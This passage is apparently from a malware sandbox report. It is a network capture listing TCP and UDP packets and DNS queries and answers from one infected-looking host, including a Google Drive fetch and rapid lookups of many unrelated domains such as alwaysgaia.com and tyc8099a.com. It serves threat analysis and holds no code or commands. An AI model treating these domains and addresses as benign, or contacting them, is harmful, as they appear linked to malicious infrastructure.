                                                                                    Mar 18, 2024 14:55:30.022418976 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.022483110 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.022516012 CET4984180192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:55:30.022701979 CET4984180192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:55:30.202522039 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.202567101 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.202692986 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.202702999 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.202815056 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.202825069 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.202940941 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.203087091 CET4984180192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:55:30.203110933 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.203121901 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.203282118 CET4984180192.168.11.2046.30.215.63
                                                                                    Mar 18, 2024 14:55:30.203332901 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.203344107 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.203619957 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.204010010 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.204225063 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.383109093 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.383121014 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.383130074 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.383254051 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.383373976 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.383383036 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.383392096 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.383424044 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.383433104 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.383697987 CET804984146.30.215.63192.168.11.20
                                                                                    Mar 18, 2024 14:55:30.383712053 CET804984146.30.215.63192.168.11.20

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Mar 18, 2024 14:47:25.948287010 CET6384653192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:47:26.043293953 CET53638461.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:47:26.541344881 CET6429753192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:47:26.637115002 CET53642971.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:47:52.155826092 CET5715453192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:47:52.293610096 CET53571541.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:07.555767059 CET6410653192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:08.570800066 CET6410653192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:48:09.586029053 CET6410653192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:11.601252079 CET6410653192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:48:11.601255894 CET6410653192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:15.494843006 CET53641061.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:15.494873047 CET53641061.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:15.494880915 CET53641061.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:15.495114088 CET6410653192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:48:16.506659031 CET5095953192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:16.629506111 CET53641069.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:48:17.107050896 CET53641069.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:48:17.521766901 CET5095953192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:48:17.621726990 CET53509599.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:48:17.622044086 CET5095953192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:19.630666971 CET5095953192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:23.645477057 CET5095953192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:24.475070953 CET53509591.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:24.475142002 CET53509591.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:24.475157022 CET53509591.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:24.475173950 CET53509591.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:25.489037991 CET5909753192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:48:25.591154099 CET53590979.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:48:25.591363907 CET5909753192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:26.597892046 CET5909753192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:28.613073111 CET5909753192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:32.627887964 CET5909753192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:33.538681030 CET53590971.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:33.538705111 CET53590971.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:33.538875103 CET53590971.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:33.538969040 CET53590971.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:34.549577951 CET5296053192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:48:34.649588108 CET53529609.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:48:34.649915934 CET5296053192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:35.658407927 CET5296053192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:37.673664093 CET5296053192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:41.688338995 CET5296053192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:48:42.585294008 CET53529601.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:42.585391998 CET53529601.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:42.585402012 CET53529601.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:42.585511923 CET53529601.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:48:47.594002962 CET6041353192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:48:47.778656960 CET53604139.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:49:01.356203079 CET5490953192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:49:01.604298115 CET53549099.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:49:15.087672949 CET6266653192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:49:16.102660894 CET6266653192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:49:16.305032015 CET53626661.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:49:18.236222982 CET53626669.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:49:30.006357908 CET6212153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:49:30.137139082 CET53621211.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:49:38.193955898 CET6066653192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:49:38.298144102 CET53606661.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:49:46.346477032 CET5668053192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:49:46.528667927 CET53566801.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:49:59.890243053 CET5940153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:50:00.653686047 CET53594011.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:51:28.182038069 CET6486653192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:51:28.875148058 CET53648661.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:51:36.010031939 CET4993053192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:51:36.113307953 CET53499301.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:51:49.194308043 CET4915953192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:51:49.528858900 CET53491591.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:52:02.910022974 CET5312053192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:52:03.022871017 CET53531201.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:52:11.080534935 CET5132653192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:52:11.375252008 CET53513261.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:52:24.780528069 CET6019853192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:52:25.795288086 CET6019853192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:52:26.189543962 CET53601989.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:52:28.133424997 CET53601981.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:53:53.516031027 CET6544453192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:53:53.618843079 CET53654449.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:01.540231943 CET5506253192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:01.727125883 CET53550629.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:15.099772930 CET5379353192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:15.584105968 CET53537939.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:37.626123905 CET6245153192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:38.641098022 CET6245153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:39.656415939 CET6245153192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:41.671636105 CET6245153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:41.671636105 CET6245153192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:42.770277977 CET53624519.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:45.686364889 CET6245153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:46.384555101 CET53624519.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:46.578174114 CET53624511.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:46.578226089 CET53624511.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:46.578243017 CET53624511.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:47.389375925 CET5346453192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:47.493819952 CET53534649.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:47.494154930 CET5346453192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:48.498336077 CET5346453192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:50.513340950 CET5346453192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:54.528219938 CET5346453192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:55.435451031 CET53534641.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:55.435509920 CET53534641.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:55.435544968 CET53534641.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:55.435576916 CET53534641.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:54:56.449911118 CET4970153192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:54:56.550045013 CET53497019.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:54:56.551126957 CET4970153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:57.558706999 CET4970153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:54:59.573959112 CET4970153192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:55:01.647998095 CET53497011.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:55:01.648010969 CET53497011.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:55:01.648019075 CET53497011.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:55:02.651967049 CET6493653192.168.11.209.9.9.9
                                                                                    Mar 18, 2024 14:55:02.753537893 CET53649369.9.9.9192.168.11.20
                                                                                    Mar 18, 2024 14:55:02.753824949 CET6493653192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:55:03.760512114 CET6493653192.168.11.201.1.1.1
                                                                                    Mar 18, 2024 14:55:04.488394022 CET53649361.1.1.1192.168.11.20
                                                                                    Mar 18, 2024 14:55:04.488409996 CET53649361.1.1.1192.168.11.20

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Mar 18, 2024 14:47:25.948287010 CET192.168.11.201.1.1.10xf326Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:47:26.541344881 CET192.168.11.201.1.1.10xf411Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:47:52.155826092 CET192.168.11.201.1.1.10x89dStandard query (0)www.noonartists.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:07.555767059 CET192.168.11.201.1.1.10x1bb8Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:08.570800066 CET192.168.11.209.9.9.90x1bb8Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:09.586029053 CET192.168.11.201.1.1.10x1bb8Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:11.601252079 CET192.168.11.209.9.9.90x1bb8Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:11.601255894 CET192.168.11.201.1.1.10x1bb8Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:15.495114088 CET192.168.11.209.9.9.90x1bb8Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:16.506659031 CET192.168.11.201.1.1.10xb00fStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:17.521766901 CET192.168.11.209.9.9.90xb00fStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:17.622044086 CET192.168.11.201.1.1.10xb00fStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:19.630666971 CET192.168.11.201.1.1.10xb00fStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:23.645477057 CET192.168.11.201.1.1.10xb00fStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:25.489037991 CET192.168.11.209.9.9.90x98c5Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:25.591363907 CET192.168.11.201.1.1.10x98c5Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:26.597892046 CET192.168.11.201.1.1.10x98c5Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:28.613073111 CET192.168.11.201.1.1.10x98c5Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:32.627887964 CET192.168.11.201.1.1.10x98c5Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:34.549577951 CET192.168.11.209.9.9.90xe9ccStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:34.649915934 CET192.168.11.201.1.1.10xe9ccStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:35.658407927 CET192.168.11.201.1.1.10xe9ccStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:37.673664093 CET192.168.11.201.1.1.10xe9ccStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:41.688338995 CET192.168.11.201.1.1.10xe9ccStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:47.594002962 CET192.168.11.209.9.9.90xb34bStandard query (0)www.alpinebretech.lifeA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:01.356203079 CET192.168.11.209.9.9.90xceStandard query (0)www.manupaint.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:15.087672949 CET192.168.11.209.9.9.90xb038Standard query (0)www.plainpathproductions.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:16.102660894 CET192.168.11.201.1.1.10xb038Standard query (0)www.plainpathproductions.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:30.006357908 CET192.168.11.201.1.1.10x8628Standard query (0)www.getworthiness.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:38.193955898 CET192.168.11.201.1.1.10x6f48Standard query (0)www.foundationtest.siteA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:46.346477032 CET192.168.11.201.1.1.10x9f1dStandard query (0)www.teenpattimasterapp.orgA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:59.890243053 CET192.168.11.201.1.1.10x566aStandard query (0)www.tyc8099a.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:51:28.182038069 CET192.168.11.201.1.1.10x94ecStandard query (0)www.tyc8099a.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:51:36.010031939 CET192.168.11.201.1.1.10x5994Standard query (0)www.wbyzm5.buzzA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:51:49.194308043 CET192.168.11.201.1.1.10x10cbStandard query (0)www.feshi.storeA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:52:02.910022974 CET192.168.11.201.1.1.10xa538Standard query (0)www.spazisostenibili.orgA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:52:11.080534935 CET192.168.11.201.1.1.10x8176Standard query (0)www.cyberpsychsecurity.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:52:24.780528069 CET192.168.11.201.1.1.10xa484Standard query (0)www.t3c1srf.siteA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:52:25.795288086 CET192.168.11.209.9.9.90xa484Standard query (0)www.t3c1srf.siteA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:53:53.516031027 CET192.168.11.209.9.9.90xec96Standard query (0)www.t3c1srf.siteA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:01.540231943 CET192.168.11.209.9.9.90x6197Standard query (0)www.meliorras.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:15.099772930 CET192.168.11.209.9.9.90x80baStandard query (0)www.guiguigohost.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:37.626123905 CET192.168.11.209.9.9.90x4349Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:38.641098022 CET192.168.11.201.1.1.10x4349Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:39.656415939 CET192.168.11.209.9.9.90x4349Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:41.671636105 CET192.168.11.201.1.1.10x4349Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:41.671636105 CET192.168.11.209.9.9.90x4349Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:45.686364889 CET192.168.11.201.1.1.10x4349Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:47.389375925 CET192.168.11.209.9.9.90x3e41Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:47.494154930 CET192.168.11.201.1.1.10x3e41Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:48.498336077 CET192.168.11.201.1.1.10x3e41Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:50.513340950 CET192.168.11.201.1.1.10x3e41Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:54.528219938 CET192.168.11.201.1.1.10x3e41Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:56.449911118 CET192.168.11.209.9.9.90xb88cStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:56.551126957 CET192.168.11.201.1.1.10xb88cStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:57.558706999 CET192.168.11.201.1.1.10xb88cStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:54:59.573959112 CET192.168.11.201.1.1.10xb88cStandard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:55:02.651967049 CET192.168.11.209.9.9.90xa5a4Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:55:02.753824949 CET192.168.11.201.1.1.10xa5a4Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:55:03.760512114 CET192.168.11.201.1.1.10xa5a4Standard query (0)www.alwaysgaia.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Mar 18, 2024 14:47:26.043293953 CET1.1.1.1192.168.11.200xf326No error (0)drive.google.com142.251.41.14A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:47:26.637115002 CET1.1.1.1192.168.11.200xf411No error (0)drive.usercontent.google.com142.250.65.161A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:47:52.293610096 CET1.1.1.1192.168.11.200x89dNo error (0)www.noonartists.com172.67.158.92A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:47:52.293610096 CET1.1.1.1192.168.11.200x89dNo error (0)www.noonartists.com104.21.74.122A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:15.494843006 CET1.1.1.1192.168.11.200x1bb8Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:15.494873047 CET1.1.1.1192.168.11.200x1bb8Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:15.494880915 CET1.1.1.1192.168.11.200x1bb8Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:16.629506111 CET9.9.9.9192.168.11.200x1bb8Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:17.107050896 CET9.9.9.9192.168.11.200x1bb8Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:17.621726990 CET9.9.9.9192.168.11.200xb00fServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:24.475070953 CET1.1.1.1192.168.11.200xb00fServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:24.475142002 CET1.1.1.1192.168.11.200xb00fServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:24.475157022 CET1.1.1.1192.168.11.200xb00fServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:24.475173950 CET1.1.1.1192.168.11.200xb00fServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:25.591154099 CET9.9.9.9192.168.11.200x98c5Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:33.538681030 CET1.1.1.1192.168.11.200x98c5Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:33.538705111 CET1.1.1.1192.168.11.200x98c5Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:33.538875103 CET1.1.1.1192.168.11.200x98c5Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:33.538969040 CET1.1.1.1192.168.11.200x98c5Server failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:34.649588108 CET9.9.9.9192.168.11.200xe9ccServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:42.585294008 CET1.1.1.1192.168.11.200xe9ccServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:42.585391998 CET1.1.1.1192.168.11.200xe9ccServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:42.585402012 CET1.1.1.1192.168.11.200xe9ccServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:42.585511923 CET1.1.1.1192.168.11.200xe9ccServer failure (2)www.alwaysgaia.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:48:47.778656960 CET9.9.9.9192.168.11.200xb34bNo error (0)www.alpinebretech.life198.177.123.106A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:01.604298115 CET9.9.9.9192.168.11.200xceNo error (0)www.manupaint.com46.30.215.63A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:16.305032015 CET1.1.1.1192.168.11.200xb038No error (0)www.plainpathproductions.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:16.305032015 CET1.1.1.1192.168.11.200xb038No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:18.236222982 CET9.9.9.9192.168.11.200xb038No error (0)www.plainpathproductions.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:18.236222982 CET9.9.9.9192.168.11.200xb038No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:30.137139082 CET1.1.1.1192.168.11.200x8628Name error (3)www.getworthiness.comnonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:38.298144102 CET1.1.1.1192.168.11.200x6f48Name error (3)www.foundationtest.sitenonenoneA (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:46.528667927 CET1.1.1.1192.168.11.200x9f1dNo error (0)www.teenpattimasterapp.orgteenpattimasterapp.orgCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 14:49:46.528667927 CET1.1.1.1192.168.11.200x9f1dNo error (0)teenpattimasterapp.org84.32.84.32A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:50:00.653686047 CET1.1.1.1192.168.11.200x566aNo error (0)www.tyc8099a.com0dc4ed.manode301.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 14:50:00.653686047 CET1.1.1.1192.168.11.200x566aNo error (0)0dc4ed.manode301.com0dc4ed.qsnode301.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 14:50:00.653686047 CET1.1.1.1192.168.11.200x566aNo error (0)0dc4ed.qsnode301.com192.151.224.197A (IP address)IN (0x0001)false
                                                                                    Mar 18, 2024 14:51:28.875148058 CET1.1.1.1192.168.11.200x94ecNo error (0)www.tyc8099a.com0dc4ed.manode301.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 18, 2024 14:51:28.875148058 CET1.1.1.1192.168.11.200x94ecNo error (0)0dc4ed.manode301.com0dc4ed.qsnode301.comCNAME (Canonical name)IN (0x0001)false
